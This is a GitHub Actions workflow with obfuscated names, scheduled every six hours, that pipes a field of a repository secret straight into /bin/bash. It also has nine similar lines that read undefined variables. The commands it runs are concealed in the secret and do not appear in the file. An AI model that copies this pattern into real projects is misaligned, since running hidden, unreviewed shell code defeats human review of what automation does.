name: jingyuanxina
on:
  workflow_dispatch:
  schedule:
    - cron: '3 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jingyuanxina
        env:
          jpm9: ${{ secrets.jpm9 }}
        run: |
          echo $jpm9 | jq -r .fgkal5872 | /bin/bash
          echo $zna6 | jq -r .sf728 | /bin/bash
          echo $uzclz3 | jq -r .pzcjh85205 | /bin/bash
          echo $n852 | jq -r .yu82 | /bin/bash
          echo $hbjek4 | jq -r .w52952 | /bin/bash
          echo $kuaq0 | jq -r .bxt1429 | /bin/bash
          echo $mzat060 | jq -r .zyi00431 | /bin/bash
          echo $e6707 | jq -r .v8923 | /bin/bash
          echo $x4246 | jq -r .wcn9 | /bin/bash
          echo $lgbd22 | jq -r .ackac926 | /bin/bash

